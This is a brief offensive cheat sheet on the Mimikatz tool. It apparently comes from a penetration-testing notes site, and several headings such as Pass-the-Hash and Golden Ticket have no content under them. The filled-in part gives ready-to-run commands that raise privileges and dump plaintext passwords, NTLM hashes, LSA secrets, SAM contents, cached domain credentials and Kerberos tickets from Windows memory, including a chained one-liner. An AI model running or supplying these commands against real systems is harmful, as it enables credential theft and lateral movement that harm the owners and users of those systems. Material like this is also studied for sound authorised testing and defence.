🥝Mimikatz Basics

Mimikatz is a powerful tool to extract plaintext credentials, hashes, and Kerberos tickets from memory. Typically run with Administrator or SYSTEM privileges, it’s vital for Windows privilege escalation and lateral movement.


Basic Commands

mimikatz.exe
privilege::debug
token::elevate

Extracting Credentials

Oneliner

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Get NTLM Hashes from LSASS:

sekurlsa::logonpasswords

Dump Kerberos Tickets

sekurlsa::tickets /export

Dump Credential Manager

SAM Database

LSA Secrets

Cached Domain Credentials

Lateral Movement

Pass-the-Hash Attack

Pass The Ticket

Golden Ticket

Silver Ticket

Overpass-the-Hash

Last updated